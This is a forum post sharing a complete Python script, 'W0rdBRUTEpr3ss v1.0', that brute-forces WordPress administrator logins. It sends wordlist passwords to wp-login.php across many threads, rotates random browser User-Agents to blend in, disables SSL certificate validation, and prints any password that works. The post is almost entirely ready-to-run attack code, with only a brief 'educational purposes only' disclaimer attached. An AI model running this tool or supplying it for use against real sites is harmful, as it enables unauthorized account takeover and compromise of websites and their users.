[python] WordPress Brute Forcer

Fi8sVrs · October 23, 2014

This is a python script that performs brute forcing against WordPress installs using a wordlist.

# WordPress Brute Force by Claudio Viviani
#
# Inspired by xSecurity's WordPress Brute Muliththreading
# 
# Tested on Wordpress 3.x and 4.x
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
# Requirements:
#
# 1) python's httplib2 lib
#    Installation: pip install httplib2
#
# Features:
#
# 1) Multithreading
# 2) http and https protocols
# 3) Random User Agent

#!/usr/bin/env python

#

# WordPress Brute Force by Claudio Viviani

#

# Inspired by xSecurity's WordPress Brute Muliththreading

#

# Tested on Wordpress 3.x and 4.x

#

# Disclaimer:

#

# This exploit is intended for educational purposes only and the author

# can not be held liable for any kind of damages done whatsoever to your machine,

# or damages caused by some other,creative application of this exploit.

# In any case you disagree with the above statement,stop here.

#

# Requirements:

#

# 1) python's httplib2 lib

# Installation: pip install httplib2

#

# Features:

#

# 1) Multithreading

# 2) http and https protocols

# 3) Random User Agent

import urllib, httplib, httplib2

import socket, sys, os, os.path, optparse, random

from threading import Thread

from time import sleep

banner = """

___ ___ __

| Y .-----.----.--| .-----.----.-----.-----.-----.

|. | | _ | _| _ | _ | _| -__|__ --|__ --|

|. / \ |_____|__| |_____| __|__| |_____|_____|_____|

|: | |__|

|::.|:. |

`--- ---'

_______ __ _______

| _ .----.--.--| |_.-----| _ .-----.----.----.-----.

|. 1 | _| | | _| -__|. 1___| _ | _| __| -__|

|. _ |__| |_____|____|_____|. __) |_____|__| |____|_____|

|: 1 \ |: |

|::.. . / |::.|

`-------' `---'

W0rdBRUTEpr3ss v1.0

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it

homelabit@protonmail.ch

https://www.facebook.com/homelabit

https://twitter.com/homelabit

https://plus.google.com/+HomelabIt1/

https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""

def randomAgentGen():

userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',

'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',

'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',

'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',

'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',

'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',

'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',

'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',

'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',

'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',

'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',

'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',

'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',

'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',

'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',

'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',

'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',

'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',

'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',

'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']

UA = random.choice(userAgent)

return UA

def urlCMS(url):

if url[:8] != "https://" and url[:7] != "http://":

print('[X] You must insert http:// or https:// procotol')

os._exit(1)

# Page login

url = url+'/wp-login.php'

return url

def bodyCMS(username,pwd):

body = { 'log':username,

'pwd':pwd,

'wp-submit':'Login',

'testcookie':'1' }

return body

def headersCMS(UA):

headers = { 'User-Agent': UA,

'Content-type': 'application/x-www-form-urlencoded',

'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }

return headers

def responseCMS(response):

if response['set-cookie'].split(" ")[-1] == "httponly":

return "1"

def connection(url,user,password,UA,timeout):

username = user

pwd = password

http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)

# HTTP POST Data

body = bodyCMS(username,pwd)

# Headers

headers = headersCMS(UA)

try:

response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))

if str(response.status)[0] == "4" or str(response.status)[0] == "5":

print('\n[X] HTTP error, code: '+str(response.status))

os._exit(1)

if responseCMS(response) == "1":

print('\n')

print('[!] Password FOUND!!!')

print('')

print('[!] Username: '+user+' Password: '+password)

os._exit(0)

except socket.timeout:

print('\n[X] Connection Timeout')

os._exit(1)

except socket.error:

print('\n[X] Connection Refused')

os._exit(1)

except httplib.ResponseNotReady:

print('\n[X] Server Not Responding')

os._exit(1)

except httplib2.ServerNotFoundError:

print('\n[X] Server Not Found')

os._exit(1)

except httplib2.HttpLib2Error:

print('\n[X] Connection Error!!')

os._exit(1)

commandList = optparse.OptionParser('usage: %prog -t TARGET_URL -u USER -w WORDLIST_FILE [-p PORT] [--timeout sec]\n')

commandList.add_option('-t', '--target',

action="store",

help="Insert URL: http://www.victim.com",

)

commandList.add_option('-u', '--username',

action="store",

help="Insert username",

)

commandList.add_option('-w', '--wordfilelist',

action="store",

help="Insert wordlist files",

)

commandList.add_option('-p', '--port',

action="store",

default=0,

type="int",

help="[insert Port Number] - Default 80 or 443",

)

commandList.add_option('--timeout',

action="store",

default=10,

type="int",

help="[Timeout Value] - Default 10",

)

options, remainder = commandList.parse_args()

# Check args

if not options.target or not options.username or not options.wordfilelist:

print(banner)

print

commandList.print_help()

sys.exit(1)

# args to vars

url = options.target

user = options.username

password = options.wordfilelist

timeout = options.timeout

# Check if Wordlist file exists and has readable

if not os.path.isfile(password) and not os.access(password, os.R_OK):

print "[X] Wordlist file is missing or is not readable"

sys.exit(1)

# Open and read Wordlist file

wordlist = open(password).read().split("\n")

# Total lines (password) in Wordlist file

totalwordlist = len(wordlist)

# Gen Random UserAgent

UA = randomAgentGen()

# Url to url+login_cms_page

url = urlCMS(url)

print(banner)

print

print('[+] Target.....: '+options.target)

print('[+] Wordlist...: '+str(totalwordlist))

print('[+] Username...: '+user)

print('[+]')

print('[+] Connecting.......')

print('[+]')

# Reset var for "progress bar"

count = 0

threads = []

for pwd in wordlist:

count += 1

t = Thread(target=connection, args=(url,user,pwd,UA,timeout))

t.start()

threads.append(t)

sys.stdout.write('\r')

sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))

sys.stdout.flush()

sleep(0.210)

for a in threads:

a.join()

# no passwords found

print('\n[X] Password NOT found ')

http://packetstorm.sigterm.no/Crackers/W0rdBRUTEpr3ss_v1_0.py.txt

Sign In

[python] WordPress Brute Forcer

Recommended Posts

Fi8sVrs

Join the conversation

Browse

Activity

Pages